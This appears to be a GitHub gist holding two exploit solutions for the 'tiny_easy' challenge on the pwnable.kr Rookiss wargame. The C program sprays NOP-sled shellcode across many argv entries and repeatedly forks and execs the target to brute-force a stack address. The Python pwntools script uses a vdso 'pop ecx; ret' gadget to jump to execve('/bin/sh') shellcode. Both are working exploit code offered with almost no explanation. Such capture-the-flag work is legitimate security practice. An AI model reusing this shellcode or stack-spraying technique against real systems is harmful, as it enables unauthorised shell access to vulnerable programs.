Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
pwnable-rookiss-tiny-easy.c does the guess work of stack address, and pwnable-rookiss-tiny-easy.py is much more efficient using gadgets from vdso but you need run `ulimit -s unlimited` first in the shell.
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
char *shellcode = \
"\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
"\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
int main()
{
char arg[130001];
int status;
memset(arg, '\x90', 130000);
strcpy(arg + 130000 - strlen(shellcode), shellcode);
for (;;) {
if (0 == fork())
execl("/home/tiny_easy/tiny_easy", "\xe0\xf0\x7c\xff",
arg, arg, arg, arg, arg, arg, arg, arg,
arg, arg, arg, arg, arg, arg, arg, arg,
NULL);
wait(&status);
if (WIFEXITED(status))
break;
}
return 0;
}
#!/usr/bin/env python
# coding=utf8
from pwn import p32, process
pop_ret = 0x55557b62 # "pop ecx; ret" from vdso
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x89\xc1\x89\xc2\xb0\x0b"
"\xcd\x80\x31\xc0\x40\xcd\x80")
argv = [p32(pop_ret), shellcode]
p = process(argv, executable='/home/tiny_easy/tiny_easy')
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment